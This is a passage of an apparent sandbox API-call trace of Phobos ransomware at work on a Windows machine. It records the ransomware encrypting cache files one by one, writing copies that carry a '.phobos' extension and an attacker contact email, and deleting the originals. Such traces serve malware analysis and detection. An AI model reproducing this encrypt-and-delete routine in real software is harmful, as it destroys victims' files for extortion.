hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150, dwBufLen=0x150 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150) returned 1 [0189.330] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.330] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x202, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x202, lpOverlapped=0x0) returned 1 [0189.330] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0189.330] CloseHandle (hObject=0xb8) returned 1 [0189.330] CloseHandle (hObject=0x12c) returned 1 [0189.330] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1b;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=627518548[1]")) returned 1 [0189.331] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0189.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\Standard[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\standard[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0189.331] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=87081) returned 1 [0189.331] CloseHandle (hObject=0x12c) returned 1 [0189.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\Standard[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\standard[1]")) returned 0x2020 [0189.332] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\Standard[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\standard[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\Standard[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\standard[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0189.332] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.332] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0189.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\Standard[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\standard[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0189.333] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0189.333] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0189.333] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x15429, lpOverlapped=0x0) returned 1 [0189.355] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x15430, dwBufLen=0x15430 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x15430) returned 1 [0189.356] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x15430, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x15430, lpOverlapped=0x0) returned 1 [0190.033] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0190.033] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.033] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0190.033] CryptDestroyKey (hKey=0xa32968) returned 1 [0190.033] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0190.033] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.033] CloseHandle (hObject=0x12c) returned 1 [0190.033] CloseHandle (hObject=0xb8) returned 1 [0190.034] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\Standard[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\standard[1]")) returned 1 [0190.035] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0190.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\b2fd15[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\b2fd15[1].eot"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.036] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=34534) returned 1 [0190.036] CloseHandle (hObject=0xb8) returned 1 [0190.036] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\b2fd15[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\b2fd15[1].eot")) returned 0x2020 [0190.036] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\b2fd15[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\b2fd15[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\b2fd15[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\b2fd15[1].eot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.036] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.036] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\b2fd15[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\b2fd15[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.037] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0190.037] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.037] ReadFile (in: hFile=0xb8, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x86e6, lpOverlapped=0x0) returned 1 [0190.221] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x86f0, dwBufLen=0x86f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x86f0) returned 1 [0190.222] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x86f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x86f0, lpOverlapped=0x0) returned 1 [0190.224] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0190.224] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.224] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0190.224] CryptDestroyKey (hKey=0xa32de8) returned 1 [0190.224] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0190.224] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.224] CloseHandle (hObject=0xb8) returned 1 [0190.224] CloseHandle (hObject=0x12c) returned 1 [0190.224] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\b2fd15[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\b2fd15[1].eot")) returned 1 [0190.225] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0190.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[1].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[1].loaded_0"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.227] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=135645) returned 1 [0190.227] CloseHandle (hObject=0x12c) returned 1 [0190.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[1].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[1].loaded_0")) returned 0x2020 [0190.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[1].loaded_0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[1].loaded_0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[1].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[1].loaded_0"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.227] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.227] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[1].loaded_0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[1].loaded_0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0190.228] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.228] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x211dd, lpOverlapped=0x0) returned 1 [0190.381] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x211e0, dwBufLen=0x211e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x211e0) returned 1 [0190.382] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x211e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x211e0, lpOverlapped=0x0) returned 1 [0190.384] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0190.384] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.384] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0190.384] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.384] WriteFile (in: hFile=0xb8, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0190.384] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.384] CloseHandle (hObject=0x12c) returned 1 [0190.384] CloseHandle (hObject=0xb8) returned 1 [0190.384] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[1].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[1].loaded_0")) returned 1 [0190.386] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0190.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[2].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[2].loaded_0"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0190.408] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=25918) returned 1 [0190.409] CloseHandle (hObject=0x164) returned 1 [0190.409] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[2].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[2].loaded_0")) returned 0x2020 [0190.409] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[2].loaded_0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[2].loaded_0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[2].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[2].loaded_0"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0190.409] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.409] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[2].loaded_0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[2].loaded_0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.410] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0190.410] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.410] ReadFile (in: hFile=0x164, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x653e, lpOverlapped=0x0) returned 1 [0190.466] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6540, dwBufLen=0x6540 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6540) returned 1 [0190.466] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6540, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6540, lpOverlapped=0x0) returned 1 [0190.467] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0190.467] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.467] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0190.467] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.467] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0190.468] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.468] CloseHandle (hObject=0x164) returned 1 [0190.468] CloseHandle (hObject=0x178) returned 1 [0190.468] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[2].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[2].loaded_0")) returned 1 [0190.469] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0190.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MemMDL2.2.17[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\memmdl2.2.17[1].eot"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.470] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=106772) returned 1 [0190.470] CloseHandle (hObject=0x178) returned 1 [0190.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MemMDL2.2.17[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\memmdl2.2.17[1].eot")) returned 0x2020 [0190.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MemMDL2.2.17[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\memmdl2.2.17[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MemMDL2.2.17[1].eot" (normalized: "c:\\users\\5p5nrgjn0js 